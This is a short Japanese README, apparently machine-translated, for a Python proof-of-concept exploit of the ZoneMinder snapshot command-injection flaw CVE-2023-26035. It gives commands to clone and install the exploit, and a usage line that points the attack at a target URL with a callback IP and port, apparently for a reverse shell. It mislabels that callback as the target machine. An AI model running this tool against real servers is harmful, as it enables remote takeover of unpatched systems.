
これはPythonで書かれたスクリプトであり、CVE-2023-26035に記載されているZoneminderのセキュリティ脆弱性の悪用を可能にします。
これは、CVE-2023-26035 に記載されている Zoneminder のセキュリティ上の欠陥を悪用できる、Python で書かれたスクリプトです。このシステムは、1.36.33 および 1.37.33. より前のバージョンで脆弱です。
リポジトリをあなたのマシンにクローンし、pip を使用して依存関係をインストールします(これらのインストールをグローバルインストールから分離する環境を作成するには、virtualenv を使用することをお勧めします)。
git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt
スクリプトには、Zoneminder のルートパスを含む ターゲットURL(例: http://example.com/zm、http://example.com または **http://example.com/zoneminder)**、接続先ターゲットマシンの IP または ドメイン、および接続先ターゲットマシンの ポート が必要です。以下に例を示します:
python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443

Rapid7 Vulnerability & Exploit Database ZoneMinder スナップショットコマンドインジェクション